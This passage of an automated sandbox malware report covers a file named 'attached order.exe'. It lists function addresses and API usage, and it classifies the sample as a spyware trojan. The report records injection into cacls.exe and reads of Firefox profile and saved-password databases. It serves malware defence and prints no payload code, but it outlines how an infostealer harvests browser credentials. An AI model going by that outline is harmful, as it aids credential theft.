                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0180010E3_2_0180010E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017EE0763_2_017EE076
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017300A03_2_017300A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174E3103_2_0174E310
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017022453_2_01702245
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0180A5263_2_0180A526
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017404453_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174A7603_2_0174A760
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017427603_2_01742760
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F67573_2_017F6757
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017646703_2_01764670
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175C6003_2_0175C600
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173C6E03_2_0173C6E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FA6C03_2_017FA6C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017406803_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173E9A03_2_0173E9A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FE9A63_2_017FE9A6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017268683_2_01726868
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E08353_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E8103_2_0176E810
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C03_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017568823_2_01756882
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740B103_2_01740B10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B4BC03_2_017B4BC0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FEA5B3_2_017FEA5B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FCA133_2_017FCA13
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740D693_2_01740D69
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AD003_2_0173AD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752DB03_2_01752DB0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F6C693_2_017F6C69
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FEC603_2_017FEC60
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017EEC4C3_2_017EEC4C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174AC203_2_0174AC20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BEC203_2_017BEC20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730C123_2_01730C12
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0180ACEB3_2_0180ACEB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01758CDF3_2_01758CDF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174CF003_2_0174CF00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01746FE03_2_01746FE0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FEFBF3_2_017FEFBF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0E6D3_2_017E0E6D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01760E503_2_01760E50
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01782E483_2_01782E48
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01732EE83_2_01732EE8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F0EAD3_2_017F0EAD
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0178717A3_2_0178717A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017DD1303_2_017DD130
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172F1133_2_0172F113
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175B1E03_2_0175B1E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017451C03_2_017451C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F70F13_2_017F70F1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174B0D03_2_0174B0D0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0177508C3_2_0177508C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FF3303_2_017FF330
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017313803_2_01731380
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F124C3_2_017F124C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172D2EC3_2_0172D2EC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FF5C93_2_017FF5C9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F75C63_2_017F75C6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AD4803_2_017AD480
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017017073_2_01701707
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017ED6463_2_017ED646
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017DD62C3_2_017DD62C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FF6F63_2_017FF6F6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B36EC3_2_017B36EC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017099E83_2_017099E8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017859C03_2_017859C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017498703_2_01749870
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175B8703_2_0175B870
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B58703_2_017B5870
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FF8723_2_017FF872
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017438003_2_01743800
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F78F33_2_017F78F3
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F18DA3_2_017F18DA
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B98B23_2_017B98B2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FFB2E3_2_017FFB2E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0177DB193_2_0177DB19
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175FAA03_2_0175FAA0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FFA893_2_017FFA89
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F7D4C3_2_017F7D4C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FFD273_2_017FFD27
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017DFDF43_2_017DFDF4
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01749DD03_2_01749DD0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01743C603_2_01743C60
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C7CE83_2_017C7CE8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175FCE03_2_0175FCE0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017D9C983_2_017D9C98
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FFF633_2_017FFF63
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BFF403_2_017BFF40
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F1FC63_2_017F1FC6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F9ED23_2_017F9ED2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01741EB23_2_01741EB2
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0360A7434_2_0360A743
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0360A3AB4_2_0360A3AB
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_03608AC34_2_03608AC3
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_036112C44_2_036112C4
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0360A2884_2_0360A288
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_036114554_2_03611455
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_036098084_2_03609808
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EFE3105_2_02EFE310
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EE00A05_2_02EE00A0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F9E0765_2_02F9E076
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FB010E5_2_02FB010E
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EEC6E05_2_02EEC6E0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAA6C05_2_02FAA6C0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF06805_2_02EF0680
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F146705_2_02F14670
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F0C6005_2_02F0C600
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF27605_2_02EF2760
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EFA7605_2_02EFA760
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA67575_2_02FA6757
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF04455_2_02EF0445
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FBA5265_2_02FBA526
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F92AC05_2_02F92AC0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAEA5B5_2_02FAEA5B
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FACA135_2_02FACA13
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F64BC05_2_02F64BC0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF0B105_2_02EF0B10
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF28C05_2_02EF28C0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F8C89F5_2_02F8C89F
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F068825_2_02F06882
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02ED68685_2_02ED6868
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F908355_2_02F90835
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F1E8105_2_02F1E810
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EEE9A05_2_02EEE9A0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAE9A65_2_02FAE9A6
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EE2EE85_2_02EE2EE8
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA0EAD5_2_02FA0EAD
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F90E6D5_2_02F90E6D
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F10E505_2_02F10E50
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F32E485_2_02F32E48
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF6FE05_2_02EF6FE0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAEFBF5_2_02FAEFBF
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EFCF005_2_02EFCF00
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FBACEB5_2_02FBACEB
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F08CDF5_2_02F08CDF
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA6C695_2_02FA6C69
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAEC605_2_02FAEC60
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F9EC4C5_2_02F9EC4C
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EFAC205_2_02EFAC20
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F6EC205_2_02F6EC20
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EE0C125_2_02EE0C12
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F02DB05_2_02F02DB0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF0D695_2_02EF0D69
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EEAD005_2_02EEAD00
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EDD2EC5_2_02EDD2EC
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA124C5_2_02FA124C
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EE13805_2_02EE1380
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAF3305_2_02FAF330
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA70F15_2_02FA70F1
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EFB0D05_2_02EFB0D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F2508C5_2_02F2508C
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F0B1E05_2_02F0B1E0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF51C05_2_02EF51C0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F3717A5_2_02F3717A
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F8D1305_2_02F8D130
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EDF1135_2_02EDF113
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAF6F65_2_02FAF6F6
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F636EC5_2_02F636EC
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F9D6465_2_02F9D646
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F8D62C5_2_02F8D62C
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F916235_2_02F91623
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F854905_2_02F85490
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F5D4805_2_02F5D480
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAF5C95_2_02FAF5C9
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA75C65_2_02FA75C6
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F0FAA05_2_02F0FAA0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAFA895_2_02FAFA89
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F81B805_2_02F81B80
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAFB2E5_2_02FAFB2E
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F2DB195_2_02F2DB19
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA78F35_2_02FA78F3
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA18DA5_2_02FA18DA
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F698B25_2_02F698B2
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F0B8705_2_02F0B870
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F658705_2_02F65870
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAF8725_2_02FAF872
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF98705_2_02EF9870
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF38005_2_02EF3800
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F359C05_2_02F359C0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA9ED25_2_02FA9ED2
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF1EB25_2_02EF1EB2
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA1FC65_2_02FA1FC6
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F93FA05_2_02F93FA0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAFF635_2_02FAFF63
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F6FF405_2_02F6FF40
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F0FCE05_2_02F0FCE0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F77CE85_2_02F77CE8
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F89C985_2_02F89C98
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF3C605_2_02EF3C60
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F8FDF45_2_02F8FDF4
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02EF9DD05_2_02EF9DD0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FA7D4C5_2_02FA7D4C
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02FAFD275_2_02FAFD27
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006720205_2_00672020
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0066CED05_2_0066CED0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0066D0F05_2_0066D0F0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0066B0D05_2_0066B0D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0066B2695_2_0066B269
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0066B2205_2_0066B220
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0066B2175_2_0066B217
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006757005_2_00675700
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006739005_2_00673900
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0068BEC05_2_0068BEC0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BE3AB5_2_032BE3AB
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BE2885_2_032BE288
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C52C45_2_032C52C4
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BE7435_2_032BE743
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C54555_2_032C5455
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BCAC35_2_032BCAC3
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BD8085_2_032BD808
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02F6EF10 appears 102 times
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02F5E692 appears 86 times
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02F25050 appears 58 times
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02F37BE4 appears 102 times
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02EDB910 appears 278 times
                      Source: C:\Users\user\Desktop\attached order.exeCode function: String function: 01787BE4 appears 98 times
                      Source: C:\Users\user\Desktop\attached order.exeCode function: String function: 0172B910 appears 272 times
                      Source: C:\Users\user\Desktop\attached order.exeCode function: String function: 017AE692 appears 86 times
                      Source: C:\Users\user\Desktop\attached order.exeCode function: String function: 017BEF10 appears 102 times
                      Source: C:\Users\user\Desktop\attached order.exeCode function: String function: 01775050 appears 36 times
                      Source: attached order.exe, 00000000.00000002.16562310891.000000000A270000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs attached order.exe
                      Source: attached order.exe, 00000000.00000002.16561859855.0000000009E20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs attached order.exe
                      Source: attached order.exe, 00000000.00000000.16527388562.0000000000ED2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWDoa.exe, vs attached order.exe
                      Source: attached order.exe, 00000000.00000002.16558585775.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs attached order.exe
                      Source: attached order.exe, 00000000.00000002.16556003856.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs attached order.exe
                      Source: attached order.exe, 00000003.00000002.16880118360.00000000012A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs attached order.exe
                      Source: attached order.exe, 00000003.00000002.16880118360.00000000012BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs attached order.exe
                      Source: attached order.exe, 00000003.00000002.16880703659.000000000182D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs attached order.exe
                      Source: attached order.exeBinary or memory string: OriginalFilenameWDoa.exe, vs attached order.exe
                      Source: attached order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: attached order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.attached order.exe.4bf5828.4.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.attached order.exe.9e20000.5.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.attached order.exe.4c15848.1.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, Yr9UhjPRPHk49KsZse.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, Yr9UhjPRPHk49KsZse.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, Yr9UhjPRPHk49KsZse.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@8/6
                      Source: C:\Users\user\Desktop\attached order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\attached order.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\cacls.exeFile created: C:\Users\user\AppData\Local\Temp\t577G2K6Jump to behavior
                      Source: attached order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: attached order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: cacls.exe, 00000005.00000002.17796945970.0000000007B34000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[adUsers] SET [samAccountName] = @samAccountName, [_dn] = @_dn, [phoneCorp] = @phoneCorp, [phoneMobile] = @phoneMobile, [IpPhone] = @IpPhone, [key_card] = @key_card WHERE (([id] = @Original_id) AND ([samAccountName] = @Original_samAccountName) AND ([_dn] = @Original__dn) AND ((@IsNull_phoneCorp = 1 AND [phoneCorp] IS NULL) OR ([phoneCorp] = @Original_phoneCorp)) AND ((@IsNull_phoneMobile = 1 AND [phoneMobile] IS NULL) OR ([phoneMobile] = @Original_phoneMobile)) AND ((@IsNull_IpPhone = 1 AND [IpPhone] IS NULL) OR ([IpPhone] = @Original_IpPhone)) AND ((@IsNull_key_card = 1 AND [key_card] IS NULL) OR ([key_card] = @Original_key_card)));
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[adUsers] ([samAccountName], [_dn], [phoneCorp], [phoneMobile], [IpPhone], [key_card]) VALUES (@samAccountName, @_dn, @phoneCorp, @phoneMobile, @IpPhone, @key_card);
                      Source: cacls.exe, 00000005.00000003.17056037329.0000000000939000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17056303248.0000000000959000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17793373650.0000000000959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Employee_photo] SET [Id] = @Id, [SerialNumber] = @SerialNumber, [ePhoto] = @ePhoto, [ePath] = @ePath, [id_empl] = @id_empl WHERE (([id_photo] = @Original_id_photo) AND ([Id] = @Original_Id) AND ((@IsNull_SerialNumber = 1 AND [SerialNumber] IS NULL) OR ([SerialNumber] = @Original_SerialNumber)) AND ((@IsNull_ePath = 1 AND [ePath] IS NULL) OR ([ePath] = @Original_ePath)) AND ([id_empl] = @Original_id_empl));
                      Source: cacls.exe, 00000005.00000002.17796945970.0000000007B9A000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17065504826.0000000007B8E000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Employee_photo] ([Id], [SerialNumber], [ePhoto], [ePath], [id_empl]) VALUES (@Id, @SerialNumber, @ePhoto, @ePath, @id_empl);
                      Source: attached order.exeReversingLabs: Detection: 34%
